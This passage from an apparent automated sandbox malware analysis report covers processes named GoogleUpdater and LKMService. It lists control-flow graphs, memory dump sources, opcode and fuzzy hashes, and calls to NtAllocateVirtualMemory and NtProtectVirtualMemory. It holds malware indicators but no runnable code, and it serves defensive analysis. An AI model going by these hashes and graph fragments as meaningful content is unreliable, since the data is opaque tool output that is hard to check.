                  control_flow_graph 1616 120e100-120e109 1617 120e10c-120e11e call 12098a0 1616->1617 1620 120e121-120e12d call 120ab78 1617->1620 1622 120e132-120e140 1620->1622 1622->1617 1623 120e142-120e163 1622->1623 1625 120e1e6-120e1ec 1623->1625 1626 120e169-120e16f 1623->1626 1625->1617 1627 120e1f2-120e200 1625->1627 1626->1620 1628 120e171-120e1d8 call 1208fe0 1626->1628 1631 120e202-120e252 call 1208fe0 1627->1631 1632 120e253-120e259 1627->1632 1628->1620 1654 120e1de-120e1e5 1628->1654 1632->1620 1633 120e25f-120e26d 1632->1633 1638 120e2c0-120e2e9 1633->1638 1639 120e26f-120e2bf call 1208fe0 1633->1639 1658 120e2eb-120e2f8 1638->1658 1659 120e30c-120e31d 1638->1659 1661 120e2fa-120e308 call 1208fa0 1658->1661 1659->1661 1662 120e31f-120e339 1659->1662 1669 120e34b-120e357 1661->1669 1671 120e30a 1661->1671 1662->1669 1670 120e33b-120e347 1662->1670 1672 120e358-120e37f 1670->1672 1673 120e349 1670->1673 1671->1659 1673->1661
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID: %A?T
                  • API String ID: 0-4079540278
                  • Opcode ID: 07eb05fc3ef6d6c6bbe0715c9c5389f7fd51b666e8c34aa26ce3e41516d29836
                  • Instruction ID: d52372b760f9c11b3ba15010e09d230bcee28a42ae635674156c1fc3341c7360
                  • Opcode Fuzzy Hash: 07eb05fc3ef6d6c6bbe0715c9c5389f7fd51b666e8c34aa26ce3e41516d29836
                  • Instruction Fuzzy Hash: 9A613531F001158FCB09EBBDC8544ADFBE6AFC921076A4569DA09FB3A6CE309D458B91

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1717 1208d68-1208db4 1721 1208dbc-1208dcd 1717->1721 1721->1721 1722 1208dcf-1208e18 call 1209028 1721->1722 1741 1208e1b call 120e100 1722->1741 1742 1208e1b call 120a161 1722->1742 1743 1208e1b call 50e2dec 1722->1743 1744 1208e1b call 1209ac5 1722->1744 1745 1208e1b call 50e4c28 1722->1745 1746 1208e1b call 120cf48 1722->1746 1747 1208e1b call 120be08 1722->1747 1748 1208e1b call 50e0040 1722->1748 1749 1208e1b call 120a170 1722->1749 1750 1208e1b call 120aeb0 1722->1750 1751 1208e1b call 120d950 1722->1751 1752 1208e1b call 120d955 1722->1752 1753 1208e1b call 50e5538 1722->1753 1754 1208e1b call 120c1b8 1722->1754 1755 1208e1b call 120be18 1722->1755 1756 1208e1b call 50e4c17 1722->1756 1757 1208e1b call 50e2df0 1722->1757 1725 1208e1d-1208e1f 1725->1722 1726 1208e21-1208e31 1725->1726 1726->1721 1728 1208e33-1208ec2 1726->1728 1733 1208ed7-1208ede 1728->1733 1733->1733 1734 1208ee0-1208eea 1733->1734 1736 1208ec4-1208ed1 1734->1736 1737 1208eec-1208f01 1734->1737 1736->1733 1740 1208f02 1737->1740 1740->1740 1741->1725 1742->1725 1743->1725 1744->1725 1745->1725 1746->1725 1747->1725 1748->1725 1749->1725 1750->1725 1751->1725 1752->1725 1753->1725 1754->1725 1755->1725 1756->1725 1757->1725
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID: t~
                  • API String ID: 0-899910758
                  • Opcode ID: a5d81d44554ec6143c9a1f2549217eb893c859c5754b08b84187407686b6cae4
                  • Instruction ID: cc3e6ff3677ab2334a3a094e4d43f280074c330b1a95e6227906938a87039ab1
                  • Opcode Fuzzy Hash: a5d81d44554ec6143c9a1f2549217eb893c859c5754b08b84187407686b6cae4
                  • Instruction Fuzzy Hash: AE416C35E2030ACFCB19CF69C49495EBBB2BF89310B148569E905AB362DB71EC46CB40

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1759 120be08-120be33 call 12098a0 1762 120be3c-120be3f 1759->1762 1763 120be44-120be8a call 1208f70 call 1208fe0 1762->1763 1769 120be8c-120be93 1763->1769
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID: t~
                  • API String ID: 0-899910758
                  • Opcode ID: 5152940ec3556eacc4a5b961633f0d205bf64c436c9aabd53418bcb08920d6e7
                  • Instruction ID: d12182452a38d22d0ba03c9aff616912e54ad87a2520f7965ce78e5214f33e19
                  • Opcode Fuzzy Hash: 5152940ec3556eacc4a5b961633f0d205bf64c436c9aabd53418bcb08920d6e7
                  • Instruction Fuzzy Hash: E211E531B152418FCB15DB78D8414AEBBB2BFC922472441BED508E7392DB359D46CB90

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1770 120be18-120be2a 1771 120be31-120be33 1770->1771 1772 120be2c call 12098a0 1770->1772 1773 120be3c-120be3f 1771->1773 1772->1771 1774 120be44-120be8a call 1208f70 call 1208fe0 1773->1774 1780 120be8c-120be93 1774->1780
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID: t~
                  • API String ID: 0-899910758
                  • Opcode ID: 71b110b7234f2fe97e1cab250fa6449a5cc6cc097a5498d5bec4ffff049adc33
                  • Instruction ID: 94f90e57e9be1459287494d608c8be1c427ad9a9836912e97da51fd15a56f825
                  • Opcode Fuzzy Hash: 71b110b7234f2fe97e1cab250fa6449a5cc6cc097a5498d5bec4ffff049adc33
                  • Instruction Fuzzy Hash: 60017C75F101058F8B14DB69D84186EB7B2BBCD214B504169D918A7392DB31AD45CBA0
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ed00726355627600b03988cabe26641fc1cdbd96ada680582a2ca6775044be5f
                  • Instruction ID: 33cc66891e00aa3e21e8482b84c002c2a727911bf808a2c88e906b143974aa53
                  • Opcode Fuzzy Hash: ed00726355627600b03988cabe26641fc1cdbd96ada680582a2ca6775044be5f
                  • Instruction Fuzzy Hash: C1410672F202298FDB15DE6CD88479DBAF2AB58310F564266D901FB3C2DA758C04CBD0
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a66d230ce4c027b1a944cd0126145b00b8dd746080604446c119e851d59b07b1
                  • Instruction ID: f78224f4dc5c69a92e4bdc938a7a3dd6fe3960857755ac38fe928cbca6e29f56
                  • Opcode Fuzzy Hash: a66d230ce4c027b1a944cd0126145b00b8dd746080604446c119e851d59b07b1
                  • Instruction Fuzzy Hash: 7C412F35E2060ACFDB19CF68C484A5EBBB2BF59310F144569E505AB362DB71ED46CF40
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c1c7533af33e08d670e7ea07c7944b9c3d1842145c686fd40e905592a2bb8b61
                  • Instruction ID: ddd72e34460e1dad362d9cd5ee54d95ef1af6b7e248a7c6b4340ff42dd8c4ec0
                  • Opcode Fuzzy Hash: c1c7533af33e08d670e7ea07c7944b9c3d1842145c686fd40e905592a2bb8b61
                  • Instruction Fuzzy Hash: FC2156B6A1C3958FCB1387B998500AEBFB1AF8722071507E7C545EB2E7C6704C06C3A2
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 55304a1cf662c2c97d2d03d968de39ae7abebb2928b6e8782711f100fe061ccc
                  • Instruction ID: 71eea1bff35ef05a7f3f51c04ad49f2bffa71599127d02d69bfab0bef1b4f426
                  • Opcode Fuzzy Hash: 55304a1cf662c2c97d2d03d968de39ae7abebb2928b6e8782711f100fe061ccc
                  • Instruction Fuzzy Hash: 5631F873E112259FCB05DF7898044A9BBB2BB9536435A42ADD80AFB751C736DC42CBD0
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b06e11623e5e0898eefa4b63fa7c8aafce13590cb5b8292440f46cc2bafac891
                  • Instruction ID: 5a4cb24f86a144e6f16eea8fbf4963dfc5d47135fcb1482c5ab3bed68e69536d
                  • Opcode Fuzzy Hash: b06e11623e5e0898eefa4b63fa7c8aafce13590cb5b8292440f46cc2bafac891
                  • Instruction Fuzzy Hash: 13212873E11625DB8B049FB8D8044A9B7B2BB9436435A426DDC0AF7741C736DC41CBC0
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a75a0e3bc88b0093e8a4e98f0041ca3a845422b7e703d02c1c75c458a8ba93c5
                  • Instruction ID: 0bf52b7e8faee1279ae6af75e11f11d01371d5dead625b13b20fd7959a1594d4
                  • Opcode Fuzzy Hash: a75a0e3bc88b0093e8a4e98f0041ca3a845422b7e703d02c1c75c458a8ba93c5
                  • Instruction Fuzzy Hash: 5311E3F67001650B8B4AB779741107C36C7DBCA62535816BEE20EEB3C3CE258E0743A6
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eb28192964f56358bd1d33506f9e206a8e228d07c01b73bab5405f21e0641646
                  • Instruction ID: c4e7df79c70b8fe0686406dce9687d80c771315b9bb46f39da9f60560ab8629a
                  • Opcode Fuzzy Hash: eb28192964f56358bd1d33506f9e206a8e228d07c01b73bab5405f21e0641646
                  • Instruction Fuzzy Hash: 2811BE36B202258F8B44DF7CC89485ABBF6AF8921531541B9E906EB361EB30EC01CB90
                  Memory Dump Source
                  • Source File: 00000003.00000002.4657063679.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_e9d000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 278cd3074adfcec1da2504ec73ef39e13d4a164e21dc0317c852cdd41ad23563
                  • Instruction ID: f7e47e3508ab1c62ed94262b335cda188e344681eda376fc977115a6f1afe0ef
                  • Opcode Fuzzy Hash: 278cd3074adfcec1da2504ec73ef39e13d4a164e21dc0317c852cdd41ad23563
                  • Instruction Fuzzy Hash: 8001A77240A354DAEB104A26CD847A7BF98EF41364F18D41AEE096A296C6799840C671
                  Memory Dump Source
                  • Source File: 00000003.00000002.4657063679.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_e9d000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d4f36509cbbfff281923aebae00ff3f01f2e7fece2ea4207fce60505d18842d6
                  • Instruction ID: 8c98cdd09f8e3a124ea76f49bec23c885f2a951ee6ce148e0b7e73b9cb05942f
                  • Opcode Fuzzy Hash: d4f36509cbbfff281923aebae00ff3f01f2e7fece2ea4207fce60505d18842d6
                  • Instruction Fuzzy Hash: 49F0C272409354AAEB108A16CD84B63FF98EB81778F18C45AED085B296C3789C40CA71
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: db85c00b16a2743ba5ce178a6196b8e9b29c5280d4a270a6dbca218917fb60c0
                  • Instruction ID: e5bf339df51af6808aef59a4c3a87fe6144c96551dba171e5ce463231eba7167
                  • Opcode Fuzzy Hash: db85c00b16a2743ba5ce178a6196b8e9b29c5280d4a270a6dbca218917fb60c0
                  • Instruction Fuzzy Hash: 6BF050312487518FC717A775EC1041E7FF2DEC62203458ABED14A97672DF681C06C7A1
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2ea75cc37d9558f8e7a1672b4fc4cb2d2e34296a70c784f13518055df8132287
                  • Instruction ID: 1bb9854c1c0eee3cebd585ffcc59e2672adae85681310dee9e2685ec67b5f416
                  • Opcode Fuzzy Hash: 2ea75cc37d9558f8e7a1672b4fc4cb2d2e34296a70c784f13518055df8132287
                  • Instruction Fuzzy Hash: 6FF03039310504CFC3299B2DC844C12BBE9EFCD72532695A9D60ADB776CA70EC41C751
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3759e37aeb7ca14176e514e90d6127292877f8bffd23620f9d5ee446b7e02ad6
                  • Instruction ID: 8d1a5c304a5ef68eea3149d5937da4f8bae7de02540a35bea845c4591402f7a8
                  • Opcode Fuzzy Hash: 3759e37aeb7ca14176e514e90d6127292877f8bffd23620f9d5ee446b7e02ad6
                  • Instruction Fuzzy Hash: BCE04F367106108F8729AB39D44082A73FAAFDA22535401BDE10ACB7B2CE71EC42CB90
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 34c82e6c4bd50144d0c35c1a9c2c594f8a15eddecb9cc5fb48fb8d4aa15b7412
                  • Instruction ID: 2aa347613634cb5c658f20c9e52f4c5ec832166cb142680803caa71eb2d9b292
                  • Opcode Fuzzy Hash: 34c82e6c4bd50144d0c35c1a9c2c594f8a15eddecb9cc5fb48fb8d4aa15b7412
                  • Instruction Fuzzy Hash: 76E0E5316117108FC369AB39D404816B7E6AF9A22535145BDD40A9B761DA32EC45CB80
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: caa03c6c25f0615057738af062ff1fdd236f7b3199ab602c3314af7946dfb15e
                  • Instruction ID: 3fcd85252c83f1869215437292730bda1ac8219c7e3738b6aff47c937fb954e4
                  • Opcode Fuzzy Hash: caa03c6c25f0615057738af062ff1fdd236f7b3199ab602c3314af7946dfb15e
                  • Instruction Fuzzy Hash: 2DE09235711A00CFC769EB35D058929B7E2AF9922536185ACD40A9BBA1DB32EC85CB40
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 76c5174dde02cdee82b3b1a5b6cc0f1efe49d2ef085a34015900e4c917417745
                  • Instruction ID: 06bd3479870aedca23db27013e6a6f657bfac32205d65054fef315ff856fadbb
                  • Opcode Fuzzy Hash: 76c5174dde02cdee82b3b1a5b6cc0f1efe49d2ef085a34015900e4c917417745
                  • Instruction Fuzzy Hash: B2D01275A01208EF8704DFB5D94655D77F5EFCD300B1154A8E505F7240DA716E11AB51
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0fadde3145d2930c6a991fc31f49c97a98c094205af05f2f55702de6350c4070
                  • Instruction ID: 9296968168dc781c90d4903bd4a652d90f833b81b725e2d1c3109315a36b6d73
                  • Opcode Fuzzy Hash: 0fadde3145d2930c6a991fc31f49c97a98c094205af05f2f55702de6350c4070
                  • Instruction Fuzzy Hash: 81C002392542048F8344DB58E588C11B7E9EB4C624316C195E90D8B332C631FC00CA44

                  Execution Graph

                  Execution Coverage:23.5%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:0%
                  Total number of Nodes:6
                  Total number of Limit Nodes:0
                  execution_graph 10414 5256230 10415 525627b NtAllocateVirtualMemory 10414->10415 10417 52562c2 10415->10417 10418 5255d50 10419 5255d9e NtProtectVirtualMemory 10418->10419 10421 5255de8 10419->10421
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID: j'R$&03$9!7J$;.%
                  • API String ID: 0-3501266285
                  • Opcode ID: f49427b06f837deea5087b9a5a31f3e60142e2d66341eaea9b823fe822da3c87
                  • Instruction ID: 73dfe3a3facc0be88cfb4b5272dce1245c7453bdb7f519384975d727d5bb5af7
                  • Opcode Fuzzy Hash: f49427b06f837deea5087b9a5a31f3e60142e2d66341eaea9b823fe822da3c87
                  • Instruction Fuzzy Hash: 0DE31B75E112298FDB68DF68C850A9EB3B2FB48204F5185E9D809F7750DB35AE81CF90
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID: j'R$&03$9!7J$;.%
                  • API String ID: 0-3501266285
                  • Opcode ID: fa0cd1611591321a54f011a8184fa20d698109490040fe882a7df7335ec823f7
                  • Instruction ID: 48c2607a0f3ba917aaf248bf572b33e681f25069bc006c942c87bd2fb2023a74
                  • Opcode Fuzzy Hash: fa0cd1611591321a54f011a8184fa20d698109490040fe882a7df7335ec823f7
                  • Instruction Fuzzy Hash: F0E31B75E112298FDB68DF68C850A9EB3B2FB48204F5185E9D809F7750DB35AE81CF90

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2209 2bbb7b8-2bbb7c6 2210 2bbb7c8-2bbb7d4 2209->2210 2212 2bbb7da 2210->2212 2213 2bbb882-2bbb88d 2210->2213 2214 2bbb7df-2bbb7fa 2212->2214 2213->2214 2215 2bbb893-2bbb8ab 2213->2215 2219 2bbb800-2bbb802 2214->2219 2215->2210 2218 2bbb8b1-2bbb8bc 2215->2218 2220 2bbbb0e-2bbbb23 2218->2220 2221 2bbb8c2 2218->2221 2222 2bbb849-2bbb857 2219->2222 2223 2bbb804-2bbb811 2219->2223 2248 2bbbb56-2bbbb6c 2220->2248 2249 2bbbb25-2bbbb51 2220->2249 2224 2bbb8c9-2bbb903 2221->2224 2225 2bbb999-2bbb9bc 2221->2225 2226 2bbb9e9-2bbba14 call 2bb99a0 2221->2226 2227 2bbba19-2bbba3c 2221->2227 2228 2bbb908-2bbb92b 2221->2228 2229 2bbba7d-2bbba88 2221->2229 2230 2bbb972-2bbb994 2221->2230 2231 2bbbae2-2bbbb09 2221->2231 2232 2bbb9c1-2bbb9e4 2221->2232 2233 2bbba41-2bbba4f 2221->2233 2234 2bbb930-2bbb93c 2221->2234 2235 2bbbab6-2bbbadd 2221->2235 2244 2bbb859-2bbb85f 2222->2244 2245 2bbb871-2bbb87d 2222->2245 2223->2210 2236 2bbb813-2bbb834 2223->2236 2278 2bbbcb4-2bbbcbb 2224->2278 2225->2278 2226->2278 2227->2278 2228->2278 2229->2210 2241 2bbba8e-2bbbab1 2229->2241 2230->2278 2231->2278 2232->2278 2233->2210 2240 2bbba55-2bbba78 2233->2240 2234->2210 2237 2bbb942-2bbb96d 2234->2237 2235->2278 2236->2222 2262 2bbb836-2bbb83c 2236->2262 2237->2278 2240->2278 2241->2278 2257 2bbb863-2bbb86f 2244->2257 2258 2bbb861 2244->2258 2245->2278 2248->2222 2260 2bbbb72-2bbbb84 2248->2260 2249->2278 2257->2245 2258->2245 2291 2bbbbae-2bbbbb6 2260->2291 2292 2bbbb86-2bbbba9 2260->2292 2262->2214 2274 2bbb83e-2bbb847 2262->2274 2274->2222 2291->2210 2295 2bbbbbc-2bbbbce 2291->2295 2292->2278 2302 2bbbbd0-2bbbbd8 2295->2302 2303 2bbbc06-2bbbc2e 2295->2303 2302->2219 2305 2bbbbde-2bbbc01 2302->2305 2309 2bbbc89-2bbbca3 2303->2309 2310 2bbbc30-2bbbc5f 2303->2310 2305->2278 2322 2bbbca6 call 2bbcfb0 2309->2322 2323 2bbbca6 call 2bbcfa0 2309->2323 2310->2214 2314 2bbbc65-2bbbc87 2310->2314 2314->2278 2316 2bbbca9-2bbbcb2 call 2bb8f70 2316->2278 2322->2316 2323->2316
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.2369960955.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2bb0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID: 9x=]
                  • API String ID: 0-2310485032
                  • Opcode ID: 09857c779ab38378662977312bd2cc4f1b9abba1bc9c298eb8c639203ebd2928
                  • Instruction ID: a39eebd8c301eb9024bb4edcb01888fba2655bca53c2794a129d80c6d1ded4f0
                  • Opcode Fuzzy Hash: 09857c779ab38378662977312bd2cc4f1b9abba1bc9c298eb8c639203ebd2928
                  • Instruction Fuzzy Hash: D8D1AD79B101258F8B59EB6DC85897E77E2FF8C61830544A8ED07EB361DEA4DC02CB91

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2324 52561f2-52562c0 NtAllocateVirtualMemory 2327 52562c2-52562c8 2324->2327 2328 52562c9-52562ee 2324->2328 2327->2328
                  APIs
                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 052562B3
                  Memory Dump Source
                  • Source File: 00000004.00000002.2372489444.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_5250000_LKMService.jbxd
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: e8c398a4c8c7e141440af9d1bc03dec15191772dc06c942d088b250a2ca11dfd
                  • Instruction ID: 8a8eb84eb923ae50bcb0861c180cd9cf2ee210e24af408d4fd6d6171d648b07f
                  • Opcode Fuzzy Hash: e8c398a4c8c7e141440af9d1bc03dec15191772dc06c942d088b250a2ca11dfd
                  • Instruction Fuzzy Hash: 523169718053898FDB11CFA9C8856EEBFF0FF49310F54885AE945A7211CB78A916CB91

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2332 5255d49-5255de6 NtProtectVirtualMemory 2335 5255def-5255e14 2332->2335 2336 5255de8-5255dee 2332->2336 2336->2335
                  APIs
                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05255DD9
                  Memory Dump Source
                  • Source File: 00000004.00000002.2372489444.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_5250000_LKMService.jbxd
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: 7cd27da85f804603831b1464bbb7c02a24af102a55ce23ae64d782a0c0849363
                  • Instruction ID: bd821294318c1879acaa2c7ee5859b01c59c94748b752d65f85d921b58e35781
                  • Opcode Fuzzy Hash: 7cd27da85f804603831b1464bbb7c02a24af102a55ce23ae64d782a0c0849363
                  • Instruction Fuzzy Hash: 3921F4B1D0134A9FDB10CFA9D584ADEFBF1FF48310F20841AE519A7200C7759914CBA0

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2340 5255d50-5255de6 NtProtectVirtualMemory 2343 5255def-5255e14 2340->2343 2344 5255de8-5255dee 2340->2344 2344->2343
                  APIs
                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05255DD9
                  Memory Dump Source
                  • Source File: 00000004.00000002.2372489444.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_5250000_LKMService.jbxd
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: 0ab2921146929c7d7bcedd609ec64211815a092dcfc780832357eeeea46d451f
                  • Instruction ID: 8310b43d2f6ba0e18792b08cd079c8728d2172e2a57a00eb0a7a4117c0523fdf
                  • Opcode Fuzzy Hash: 0ab2921146929c7d7bcedd609ec64211815a092dcfc780832357eeeea46d451f
                  • Instruction Fuzzy Hash: 8B21E6B1D013499FDB10DFAAD984ADEFBF5FF48310F20842AE919A7250C7759910CBA5

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2348 5256230-52562c0 NtAllocateVirtualMemory 2351 52562c2-52562c8 2348->2351 2352 52562c9-52562ee 2348->2352 2351->2352
                  APIs
                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 052562B3
                  Memory Dump Source
                  • Source File: 00000004.00000002.2372489444.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_5250000_LKMService.jbxd
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: dfce562aca3f76aeee09d22e94c238734b3e8d0ec50a91a7d67b92d311448395
                  • Instruction ID: 5a58d95f273abb33478d3e1b1ddf9e44513604202bb780dbe5eb39b1b43f03a5
                  • Opcode Fuzzy Hash: dfce562aca3f76aeee09d22e94c238734b3e8d0ec50a91a7d67b92d311448395
                  • Instruction Fuzzy Hash: BF21E4B19002499FDB10DFAAC885ADEFBF5FF48320F50841AE919A7210C775A954CBA5

                  Control-flow Graph

                  • Executed
                  • Not Executed
